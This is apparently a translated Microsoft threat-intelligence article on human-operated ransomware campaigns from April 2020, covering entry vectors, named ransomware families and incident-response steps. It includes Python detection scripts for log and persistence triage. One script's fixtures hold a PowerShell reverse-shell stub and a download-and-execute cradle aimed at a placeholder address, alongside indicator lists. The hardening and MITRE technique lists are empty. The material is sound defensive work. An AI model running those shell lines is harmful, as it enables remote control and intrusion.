How to reduce the risk of ransomware attacks

Today, with remote work becoming commonplace and the load on security specialists, especially in healthcare and other critical industries, higher than ever, the groups operating ransomware are not slowing down.

In the first half of April, numerous attacker groups that had penetrated various networks over the preceding months and quietly built up a foothold activated dozens of copies of their ransomware. Medical facilities, healthcare billing companies, manufacturers, transport companies, government agencies, and educational software vendors were hit. This showed that, despite the global crisis, these groups have no regard for keeping critical services running. Companies in other sectors are being attacked as well, so every organization needs to pay close attention to signs of compromise.

Over those two weeks of ransomware activity, the number of extortion attacks rose only slightly. However, a study by Microsoft experts, together with the findings of an investigation of a separate incident by the DART team (Microsoft Detection and Response Team), showed that many of the compromises that made the attacks possible had happened much earlier. Following the pattern typical of human-operated ransomware attacks, the attackers compromised the target networks over the preceding months and waited for an opportunity to monetize their access by deploying the malware at the most convenient moment.

Many of these attacks began with reconnaissance of vulnerable internet-facing devices. In some cases, RDP servers were compromised by brute force. A wide range of tools was used, but all the attacks shared the techniques typical of human-operated ransomware: credential theft and lateral movement, after which the attackers deployed whatever tools they saw fit. Because the ransomware itself is deployed only at the final stage of the attack, defenders should focus on finding traces of credential theft and signs of lateral movement.

In this article we present the results of our analysis of such ransomware campaigns.


We have added a number of technical details, including guidance on detecting these attacks and recommendations on how to prioritize defensive actions.

Vulnerable and unmonitored internet-facing systems make human-operated attacks easy


Although new ransomware tools were deployed in the recent attacks, many of the attacks reused infrastructure left over from previous campaigns. They also used techniques well known from other human-operated ransomware attacks.

Unlike malware delivered by email, which typically moves much faster, within an hour of initial entry, the April attacks resemble the 2019 Doppelpaymer attacks. In those, the attackers gained access to the target networks well in advance and then waited for months, choosing the right moment to deploy the ransomware.

In the recent attacks, internet-facing systems with the following weaknesses were used to penetrate the target networks:

  • Remote Desktop Protocol (RDP) or virtual desktop endpoints without multi-factor authentication (MFA).
  • Older platforms that no longer receive security updates, such as Windows Server 2003 and Windows Server 2008.
  • Misconfigured web servers, including IIS, and other exposed applications.
  • Citrix Application Delivery Controller (ADC) systems affected by CVE-2019-19781.
  • Pulse Secure VPN systems affected by CVE-2019-11510.

To prevent such attacks, it is critical to apply security patches to internet-facing systems. Also note: although Microsoft experts have not yet observed it, the accumulated information suggests that attackers will eventually exploit these vulnerabilities as well: CVE-2019-0604, CVE-2020-0688, CVE-2020-10189.

As in many intrusions, the criminals stole credentials, moved laterally using popular tools such as Mimikatz and Cobalt Strike, and carried out network reconnaissance and data exfiltration. The operators obtained accounts with administrator privileges, at which point they were ready to do far more destructive things. In the networks where they deployed their ransomware, they deliberately maintained a presence on some endpoints, intending to resume activity after the ransom was paid or the systems were rebuilt. Although only a few groups became known for selling the data they collected, almost all of them viewed and exfiltrated data during the attacks, even if they had not yet advertised or sold the stolen information.

As in all human-operated ransomware attacks, the attackers' activity in the cases described spread across the network, including email, endpoints, applications, and more. Because even experts can find it difficult to completely evict the attackers from a compromised network, it is extremely important to patch vulnerable internet-facing systems and introduce restrictions to reduce the risk.

A motley collection of ransomware campaigns


This section describes the different kinds of attacks and ransomware families, but the attacks discussed follow one common pattern with minor variations. They developed in a similar way, generally using the same techniques, and the choice of a particular ransomware at the end of the attack depended almost entirely on the attackers' preference.


RobbinHood Ransomware


RobbinHood ransomware operators attracted attention for using vulnerable drivers to disable security software in the later stages of an attack. However, as in many similar attacks, they began by brute-forcing RDP on an exposed resource. As a result, the attackers obtained high-privilege credentials, mainly local administrator accounts with common or shared passwords, as well as service accounts with domain administrator privileges. RobbinHood operators, like Ryuk operators and other well-known groups, leave behind new local and Active Directory accounts so that they can regain access to the network after their tools are removed.

Vatet loader


Attackers often change their infrastructure, methods, and tools to avoid the notoriety that would attract the attention of law enforcement or security researchers. Often they hold tools in reserve, waiting until security vendors consider the corresponding artifacts inactive, in order to attract less attention. Vatet is a loader for the Cobalt Strike framework that was used in attacks in November 2018 and resurfaced in the recent events.

The loader's operators appear to have deliberately targeted hospitals, medical facilities, insulin suppliers, medical device manufacturers, and other critical organizations. They are among the most prolific ransomware operators, linked to dozens of attacks.

Using Vatet and Cobalt Strike, the group installed various ransomware families. Most recently they deployed an in-memory ransomware that uses Alternate Data Streams (ADS) and displays simplified versions of ransom notes from older ransomware families. The attackers gain access to networks through the CVE-2019-19781 vulnerability, RDP brute force against endpoints, and emails carrying .lnk files that run malicious PowerShell commands. Once inside the network, they steal credentials, including from the Credential Manager store, and move laterally until they obtain domain administrator privileges. Based on observations, the operators exfiltrate data from the network before deploying the ransomware.

NetWalker Ransomware


NetWalker operators became notorious for attacks on hospitals and medical facilities in which they sent emails promising information about COVID-19. The NetWalker ransomware was attached to those emails as a .vbs file, and this technique attracted media attention. However, the operators also compromised networks through misconfigured IIS-based applications, from which they launched Mimikatz to steal credentials. Using those credentials, the attackers then ran PsExec and ultimately installed NetWalker.

PonyFinal ransomware


This Java-based ransomware is considered new, but attacks using it are not rare. Its operators compromised internet-facing web systems and obtained privileged credentials. To maintain persistence on the attacked network, the attackers use PowerShell commands to launch the mshta.exe system tool and set up a reverse shell based on a popular PowerShell attack framework. They also used legitimate tools such as Splashtop to keep remote desktop connections alive.

Maze Ransomware


Maze was one of the first ransomware campaigns to make headlines for selling stolen data. It continues to target technology providers and public services. This ransomware has been used against managed service providers (MSPs) to gain access to their customers' data and networks.

Maze spread via email, but the operators also installed it after gaining network access through common attack vectors such as RDP brute force. Once inside, the attackers steal credentials, move laterally to reach resources and exfiltrate data, and then install the ransomware.

In a recent campaign, Microsoft researchers tracked Maze operators gaining access by brute-forcing RDP for a local administrator account on an internet-facing system. After guessing the password, the operators were able to move laterally because the built-in administrator accounts on other endpoints used the same password.
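The pattern described here and in the RobbinHood section, a burst of failed RDP logons followed by a success and then the same built-in account appearing on other hosts, can be hunted in the Windows Security event log. The Python below is an added example, not code from the original article or from Microsoft: it runs over a constructed set of 4624/4625 records normalized to dictionaries (the hosts, account names, addresses and the host-to-address inventory are invented), and the failure threshold and time window are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records (invented hosts, users and addresses),
# normalized to the fields of 4624 (success) and 4625 (failure):
# TargetUserName -> user, LogonType -> type, IpAddress -> src, Computer -> host.
FAILURES = [
    {"ts": f"2020-04-03T02:{i // 12:02d}:{(i % 12) * 5:02d}", "id": 4625,
     "host": "EDGE-RDP01", "user": "Administrator", "type": 10, "src": "203.0.113.7"}
    for i in range(60)  # 60 failed RDP logons in five minutes
]
EVENTS = FAILURES + [
    # the guess that worked: successful RDP logon (type 10) from the same source
    {"ts": "2020-04-03T02:05:10", "id": 4624, "host": "EDGE-RDP01",
     "user": "Administrator", "type": 10, "src": "203.0.113.7"},
    # a lone typo by a normal user elsewhere; must not be flagged
    {"ts": "2020-04-03T02:05:30", "id": 4625, "host": "FS01",
     "user": "jsmith", "type": 2, "src": "10.0.0.40"},
    # the same built-in account then works on other hosts, coming from
    # EDGE-RDP01's internal address: the local admin password is shared
    {"ts": "2020-04-03T02:20:00", "id": 4624, "host": "FS01",
     "user": "Administrator", "type": 3, "src": "10.0.0.5"},
    {"ts": "2020-04-03T02:21:00", "id": 4624, "host": "HR-PC12",
     "user": "Administrator", "type": 10, "src": "10.0.0.5"},
    # benign console logon; must not be flagged
    {"ts": "2020-04-03T08:00:00", "id": 4624, "host": "HR-PC12",
     "user": "jsmith", "type": 2, "src": "-"},
]
# Assumed asset inventory: which addresses belong to which host.
HOST_IPS = {"EDGE-RDP01": {"10.0.0.5"}, "FS01": {"10.0.0.20"}, "HR-PC12": {"10.0.0.40"}}


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def _burst(failures, threshold, window):
    """True when at least `threshold` failures fall inside one `window`-long span."""
    times = sorted(_ts(f) for f in failures)
    start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False


def find_rdp_brute_force(events, threshold=20, window=timedelta(minutes=10)):
    """Sources that produced a burst of 4625 failures against a host and then
    logged on to that host over RDP (4624, logon type 10)."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            failures[(e["src"], e["host"])].append(e)
    hits = []
    for (src, host), fs in failures.items():
        if not _burst(fs, threshold, window):
            continue
        first_failure = min(_ts(f) for f in fs)
        successes = sorted(
            (e for e in events
             if e["id"] == 4624 and e["type"] == 10 and e["src"] == src
             and e["host"] == host and _ts(e) >= first_failure),
            key=_ts)
        if successes:
            s = successes[0]
            hits.append({"src": src, "host": host, "user": s["user"],
                         "failures": len(fs), "success": s["ts"]})
    return hits


def find_password_reuse(events, user, origin_host, origin_ips):
    """Hosts where `user` logged on from `origin_host`'s addresses after the
    compromise: the same local account working elsewhere means a shared password."""
    return sorted({e["host"] for e in events
                   if e["id"] == 4624 and e["user"] == user
                   and e["host"] != origin_host and e["src"] in origin_ips})


if __name__ == "__main__":
    for h in find_rdp_brute_force(EVENTS):
        print(f"brute force from {h['src']} on {h['host']}: {h['failures']} failures, "
              f"then {h['user']} logged on at {h['success']}")
        reused = find_password_reuse(EVENTS, h["user"], h["host"], HOST_IPS[h["host"]])
        print(f"  {h['user']} then logged on to: {', '.join(reused)}")
```

In production the records come from the Security log (for example via Get-WinEvent on each host or from a SIEM); the threshold is deliberately low so that a slow, patient brute force is not missed, and the password-reuse check is the fastest way to decide how far a guessed local administrator password reaches.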

Having stolen the domain administrator's credentials, the attackers used Cobalt Strike, PsExec and a number of other tools to deliver various payloads and gain access to data. They established a fileless presence on the network using scheduled tasks and services that run remote PowerShell-based shells. They also enabled Windows Remote Management (WinRM) to maintain control using the stolen domain administrator account. To weaken security controls in preparation for installing the ransomware, the attackers changed various settings through Group Policy.
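Scheduled tasks and services whose command line launches PowerShell with a hidden window or an encoded command are where the persistence described above tends to show up when the task and service definitions of a compromised host are exported. The Python below is an added example, not part of the original article or of any Microsoft tooling: it decodes -EncodedCommand payloads (PowerShell expects base64 of UTF-16LE text and accepts the abbreviations -e, -ec and -enc) and flags download-and-execute and reverse-shell idioms in a constructed list of task and service definitions (hosts, names, paths and the 203.0.113.7 address are invented; the indicator list is an assumption, not a complete signature set).

```python
import base64
import re

# Constructed persistence artifacts as a responder might export them:
# scheduled-task actions and service ImagePath values (invented hosts and names).
# The encoded payload is an illustrative reverse-shell stub, not working tooling.
REVERSE_SHELL = ("$c=New-Object Net.Sockets.TCPClient('203.0.113.7',443);"
                 "$s=$c.GetStream();while($true){IEX ([IO.StreamReader]$s).ReadLine()}")
ENCODED = base64.b64encode(REVERSE_SHELL.encode("utf-16-le")).decode()

ARTIFACTS = [
    {"host": "FS01", "kind": "scheduled task", "name": "\\Microsoft\\Windows\\Update\\SyncCheck",
     "command": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "FS01", "kind": "service", "name": "WinUpdSvc",
     "command": "cmd.exe /c powershell -NonInteractive -Command "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')\""},
    # legitimate-looking script launch with no suspicious idioms; must not be flagged
    {"host": "HR-PC12", "kind": "scheduled task", "name": "\\Backup\\Nightly",
     "command": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"host": "HR-PC12", "kind": "service", "name": "Spooler",
     "command": "C:\\Windows\\System32\\spoolsv.exe"},
]

# Crude substring indicators (assumed, not exhaustive): hidden window, no profile,
# in-memory execution, download cradles and raw socket clients.
INDICATORS = ["IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
              "Net.Sockets.TCPClient", "-w hidden", "-nop"]

# -EncodedCommand and the prefixes PowerShell accepts, followed by base64 text.
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if there is none
    or the token is not valid base64-encoded UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(artifacts):
    """Flag task/service commands that launch PowerShell with suspicious idioms.
    Decoded payloads are searched too, so encoding does not hide the indicators."""
    findings = []
    for a in artifacts:
        cmd = a["command"]
        if "powershell" not in cmd.lower():
            continue
        decoded = decode_encoded_command(cmd)
        haystack = (cmd + " " + decoded if decoded else cmd).lower()
        hits = sorted({i for i in INDICATORS if i.lower() in haystack})
        if hits:
            findings.append({**a, "decoded": decoded, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in triage(ARTIFACTS):
        print(f"{f['host']} {f['kind']} {f['name']}: {', '.join(f['indicators'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Run this over the output of schtasks /query /xml and the ImagePath values under HKLM\SYSTEM\CurrentControlSet\Services from each isolated host; anything it flags should be captured (task XML, service binary path, the decoded script) before the host is rebuilt, since the same task or service is what the operators rely on to come back after a rebuild.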

Ransomware REvil


This is probably the first ransomware group to exploit the Pulse VPN vulnerability to steal credentials and gain network access. REvil (also known as Sodinokibi) became known for breaking into MSPs, gaining access to their customers' networks and documents, and selling that access. The attackers continued to do so during the current crisis, attacking MSPs and other targets, including government agencies. REvil attacks stand out for their use of new vulnerabilities, but their methods are similar to those of many other groups: once inside the network, they use tools such as Mimikatz and PsExec for credential theft, lateral movement and reconnaissance.

Other ransomware families


During the period under review, the following human-operated ransomware families were also observed:

  • Paradise. Previously distributed directly by email, it is now used in human-operated attacks.
  • RagnarLocker. Used by a group that made heavy use of RDP and Cobalt Strike with stolen credentials.
  • MedusaLocker. Probably installed through pre-existing Trickbot infections.
  • LockBit. Distributed by operators who used the publicly available CrackMapExec penetration-testing tool for lateral movement.

Immediate response to ongoing attacks


We strongly recommend that organizations immediately check for alerts related to the attacks described and prioritize investigation and remediation. Defenders should pay attention to:

  • Malicious use of PowerShell, Cobalt Strike and similar penetration-testing tools.
  • Credential theft activity, such as suspicious access to the Local Security Authority Subsystem Service (LSASS) process.
  • Tampering with security event logs or forensic artifacts such as the USN journal.

Organizations using Microsoft Defender Advanced Threat Protection (ATP) can refer to the threat analytics report for details of relevant alerts and advanced hunting queries. Those using the Microsoft Threat Experts service also receive targeted attack notifications with a detailed timeline, recommended protective measures, and remediation advice.

If your network has been attacked, immediately take the steps below to assess the extent of the compromise. When determining the scope of these attacks, do not rely solely on indicators of compromise (IOCs): most of the ransomware groups mentioned use "one-off" infrastructure and frequently change their tools and systems once they learn what their targets can detect. Wherever possible, detection and mitigation should rely on broad behavioral patterns. Vulnerabilities exploited by the criminals must also be closed as soon as possible.

Analyze attacked endpoints and credentials


Identify all credentials available on the attacked endpoint. Treat them as accessible to the attackers and treat every account associated with them as compromised. Note that attackers can copy not only the credentials of accounts logged on in interactive or RDP sessions, but also cached credentials and the passwords of service accounts and scheduled tasks, which are stored in the LSA Secrets section of the registry.

  • For endpoints onboarded to Microsoft Defender ATP, use advanced hunting to identify the accounts that logged on to the attacked endpoints; the threat analytics report contains a hunting query for this.
  • Otherwise, check the Windows Security event log for logons to the attacked endpoints: event ID 4624 with logon type 2 (interactive) or 10 (remote interactive, i.e. RDP). Also check for logon types 4 (batch, used by scheduled tasks) and 5 (service), since those credentials are stored in LSA Secrets.


Isolate endpoints that show signs of command-and-control activity or that have become targets of lateral movement. Identify these endpoints with advanced hunting queries or by searching directly for the relevant IOCs. Isolate machines with Microsoft Defender ATP, or use other data sources such as NetFlow to search in a SIEM or another centralized event management tool. Look for signs of lateral movement from known compromised endpoints.
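The two steps above, enumerating the accounts exposed on a compromised endpoint and then following those accounts to the hosts they logged on to from it, can be automated and repeated until no new hosts appear. The Python below is an added example, not the hunting query from the threat analytics report or any Microsoft code: it works over constructed 4624 records (hosts, accounts and addresses are invented) and assumes an inventory mapping each host to its IP addresses so that the source address of a logon can be attributed to a host.

```python
# Logon types that leave reusable credential material on the host: interactive (2)
# and RemoteInteractive/RDP (10) logons keep secrets in LSASS; batch (4) and
# service (5) logons use passwords stored in LSA Secrets. A plain network logon (3)
# does not normally leave a reusable password or hash on the target.
EXPOSED_TYPES = {2, 10, 4, 5}

# Constructed 4624 records (invented hosts, accounts and addresses).
LOGONS = [
    {"host": "EDGE-RDP01", "user": "CORP\\svc-backup", "type": 5, "src": "-"},
    {"host": "EDGE-RDP01", "user": "Administrator", "type": 10, "src": "203.0.113.7"},
    {"host": "EDGE-RDP01", "user": "CORP\\jsmith", "type": 3, "src": "10.0.0.40"},
    {"host": "FS01", "user": "CORP\\svc-backup", "type": 10, "src": "10.0.0.5"},
    {"host": "FS01", "user": "CORP\\da-admin", "type": 2, "src": "-"},
    {"host": "DC01", "user": "CORP\\da-admin", "type": 10, "src": "10.0.0.20"},
    {"host": "HR-PC12", "user": "CORP\\hr.user", "type": 2, "src": "-"},
]
# Assumed asset inventory used to attribute a logon's source address to a host.
HOST_IPS = {"EDGE-RDP01": {"10.0.0.5"}, "FS01": {"10.0.0.20"},
            "DC01": {"10.0.0.10"}, "HR-PC12": {"10.0.0.40"}}


def exposed_accounts(logons, hosts):
    """Accounts whose credentials must be treated as stolen on `hosts`."""
    return {e["user"] for e in logons
            if e["host"] in hosts and e["type"] in EXPOSED_TYPES}


def expand_compromise(logons, seed_hosts, host_ips):
    """Starting from known-compromised hosts, alternate two steps until stable:
    collect the accounts exposed on compromised hosts, then add every host one
    of those accounts logged on to from a compromised host's address.
    Returns (hosts, accounts, moves) with moves as (origin, account, target)."""
    ip_to_host = {ip: h for h, ips in host_ips.items() for ip in ips}
    hosts, accounts, moves = set(seed_hosts), set(), []
    while True:
        accounts |= exposed_accounts(logons, hosts)
        new_hosts = set()
        for e in logons:
            origin = ip_to_host.get(e["src"])
            if origin in hosts and e["host"] not in hosts and e["user"] in accounts:
                new_hosts.add(e["host"])
                moves.append((origin, e["user"], e["host"]))
        if not new_hosts:
            return hosts, accounts, moves
        hosts |= new_hosts


if __name__ == "__main__":
    hosts, accounts, moves = expand_compromise(LOGONS, {"EDGE-RDP01"}, HOST_IPS)
    print("isolate:", sorted(hosts))
    print("reset:", sorted(accounts))
    for origin, user, target in moves:
        print(f"  {user}: {origin} -> {target}")
```

The output is the isolation list and the password-reset list for the next step; note that a single service account exposed on the perimeter host is enough to pull the file server in, and the domain administrator who had logged on there interactively then carries the compromise to the domain controller, which is exactly the progression the Maze and RobbinHood cases above describe.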

Close vulnerabilities accessible from the Internet


Identify perimeter systems that attackers could use to gain access to your network. You can supplement your analysis with a public scanning service such as shodan.io. Systems of interest to attackers include:

  • RDP or virtual desktop endpoints without multi-factor authentication.
  • Citrix ADC systems affected by CVE-2019-19781.
  • Pulse Secure VPN systems affected by CVE-2019-11510.
  • Microsoft SharePoint servers affected by CVE-2019-0604.
  • Microsoft Exchange servers affected by CVE-2020-0688.
  • Zoho ManageEngine systems affected by CVE-2020-10189.

To further reduce exposure, Microsoft Defender ATP customers can use the Threat and Vulnerability Management (TVM) capabilities to identify, prioritize, and remediate vulnerabilities and misconfigurations. TVM lets security staff and administrators work together to eliminate the weaknesses found.

Examine and repair malware infected devices


Many attackers enter networks through malware that is already present, such as Emotet and Trickbot. These families are classified as banking trojans but can deliver any payload, including persistent backdoors. Investigate and remove all known infections and treat them as possible entry points for dangerous human adversaries. Be sure to check for exposed credentials, additional payloads, and signs of lateral movement before rebuilding the attacked endpoints or changing passwords.

Information hygiene to protect networks from human-driven ransomware


As the operators find more victims, defenders should assess risk proactively with every tool available. Continue to apply the proven preventive measures (credential hygiene, least privilege, and host firewalls) that stop attacks which exploit security weaknesses and excessive privileges.

Increase your network's resistance to intrusion, reactivation of backdoors, and lateral movement with the following measures:


For more advice on improving protection against human-operated ransomware and building more robust defenses against cyberattacks in general, see Human-operated ransomware attacks: A preventable disaster.

Microsoft Threat Protection: coordinated defense against complex, large-scale human-operated ransomware attacks


The April surge in ransomware attacks showed that the attackers are unconcerned about the consequences of disrupting services during a global crisis.

Human-operated ransomware attacks represent a new level of threat: the attackers are versed in system administration and in the configuration of security tools, so they can find the path of least resistance into the network. Faced with an obstacle, they try to break through it, and if that fails, they show ingenuity in finding new ways to advance the attack. As a result, human-operated ransomware attacks are complex and wide-ranging, and no two are identical.

Microsoft Threat Protection (MTP) provides coordinated defense that helps block the entire chain of a complex human-operated ransomware attack. MTP combines the capabilities of several Microsoft 365 security services to manage protection, prevention, detection, and response across endpoints, email, identities, and applications.

Using built-in intelligence, automation and integration, MTP can block attacks, eliminate the attackers' presence, and automatically remediate affected resources. It correlates and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also offers cross-domain hunting capabilities that help identify how an attack spread and understand how to strengthen defenses in each case.

Microsoft Threat Protection is part of the chip-to-cloud approach, which combines hardware, operating system, and cloud protection. Hardware-backed security features in Windows 10, such as address space layout randomization (ASLR), Control Flow Guard (CFG), and others, make the platform more resilient to many serious threats, including those that exploit kernel driver vulnerabilities. These features are integrated with Microsoft Defender ATP, providing end-to-end protection that starts with a strong hardware root of trust. On Secured-core PCs, these mitigations are enabled by default.

We continue to work with customers, partners, and the research community to track human-operated ransomware and other sophisticated tools. In difficult cases, customers can engage the Microsoft Detection and Response Team (DART) to help with investigation and recovery.

Appendix: MITRE ATT&CK techniques observed


Human-operated ransomware attacks use a wide range of techniques available to attackers once they control privileged domain accounts. Listed below are the techniques widely used in the April 2020 attacks against healthcare and critical organizations.

Credential Access:


Persistence:


Command and Control:


Discovery:


Execution:


Lateral Movement:


Defense Evasion:


Impact:

